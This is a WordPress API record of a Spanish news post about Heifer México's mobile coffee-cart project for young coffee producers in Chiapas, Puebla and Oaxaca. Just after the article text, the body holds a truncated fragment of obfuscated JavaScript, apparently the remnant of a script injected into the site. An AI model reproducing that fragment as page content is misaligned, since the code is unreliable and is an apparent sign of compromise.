{"id":23012,"date":"2025-07-17T19:21:47","date_gmt":"2025-07-17T19:21:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23012"},"modified":"2025-07-17T19:21:48","modified_gmt":"2025-07-17T19:21:48","slug":"cafeterias-moviles-impulsan-el-cafe","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23012","title":{"rendered":"CAFETER\u00cdAS M\u00d3VILES IMPULSAN EL CAF\u00c9"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"23013\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227077-1024x683.jpg\" alt=\"\" class=\"wp-image-23013\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227077-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227077-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227077-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227077-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227077.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"23014\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227074-1024x683.jpg\" alt=\"\" class=\"wp-image-23014\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227074-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227074-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227074-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227074-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000227074.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Heifer M\u00e9xico conecta a j\u00f3venes con productores para fortalecer la cadena<\/p>\n\n\n\n<p>17 de julio del 2025. Con el objetivo de fortalecer la cadena de valor del caf\u00e9 y fomentar el emprendimiento entre j\u00f3venes, Heifer International M\u00e9xico puso en marcha el Proyecto Cafeter\u00edas M\u00f3viles, una iniciativa vinculada al programa Promesa Caf\u00e9 que busca integrar a nuevas generaciones en la comercializaci\u00f3n del arom\u00e1tico.<br>La estrategia contempla la entrega de 14 cafeter\u00edas m\u00f3viles en estados del sur-sureste del pa\u00eds, transformando la forma en que el caf\u00e9 llega al consumidor final. Recientemente, dos unidades fueron entregadas a j\u00f3venes de las organizaciones PRODUCTORES DE CAF\u00c9 CAPIT\u00c1N LUIS A. VIDAL SPR DE RL y Caf\u00e9 Oro de la Monta\u00f1a, ambas en Jaltenango.<br>Silmar Velasco, coordinador t\u00e9cnico de Caf\u00e9 Oro de la Monta\u00f1a, destac\u00f3 que estas unidades representan una oportunidad para que los j\u00f3venes participen m\u00e1s all\u00e1 de la producci\u00f3n, involucr\u00e1ndose en la venta directa y a\u00f1adiendo valor desde el origen. Por su parte, Filem\u00f3n S\u00e1nchez P\u00e9rez, presidente de PRODUCTORES DE CAF\u00c9 CAPIT\u00c1N, expres\u00f3 que este proyecto da herramientas a las nuevas generaciones para asumir un papel protag\u00f3nico en el desarrollo de sus comunidades.<br>Los beneficiarios Dania Gonz\u00e1lez y Berny V\u00e1squez reconocieron la iniciativa como una puerta para crecer en el mundo del caf\u00e9 y compartir la historia detr\u00e1s de cada taza. \u201cEstamos listos para llevar el sabor de nuestro caf\u00e9 directamente a la gente\u201d, se\u00f1al\u00f3 Berny.<br>Hasta ahora, Heifer ha entregado ocho unidades \u2014cuatro en Puebla y cuatro en Chiapas\u2014 y prev\u00e9 distribuir seis m\u00e1s en Oaxaca, beneficiando directamente a igual n\u00famero de organizaciones aliadas e impactando indirectamente a m\u00e1s de 1,600 productores en estos tres estados.<br>David Olvera, director de Promesa Caf\u00e9, subray\u00f3 que con estas cafeter\u00edas m\u00f3viles se forma la primera generaci\u00f3n de mujeres y j\u00f3venes emprendedores, l\u00edderes y solidarios, fortaleciendo el ingreso de las familias cafetaleras e impulsando su participaci\u00f3n en mercados m\u00e1s justos.<br>El proyecto se alinea con la visi\u00f3n de Heifer Internacional M\u00e9xico de transformar los sistemas alimentarios hacia modelos sostenibles, mediante un enfoque de paisaje que prioriza la sostenibilidad, inclusi\u00f3n y colaboraci\u00f3n estrat\u00e9gica para un impacto duradero.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Heifer M\u00e9xico conecta a j\u00f3venes con productores para fortalecer la cadena 17 de julio del 2025. Con el objetivo de fortalecer la cadena de valor del caf\u00e9 y fomentar el emprendimiento entre j\u00f3venes, Heifer International M\u00e9xico puso en marcha el Proyecto Cafeter\u00edas M\u00f3viles, una iniciativa vinculada al programa Promesa Caf\u00e9 que busca integrar a nuevas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23013,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23012","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23012","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23012"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23012\/revisions"}],"predecessor-version":[{"id":23015,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23012\/revisions\/23015"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23013"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23012"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23012"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23012"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}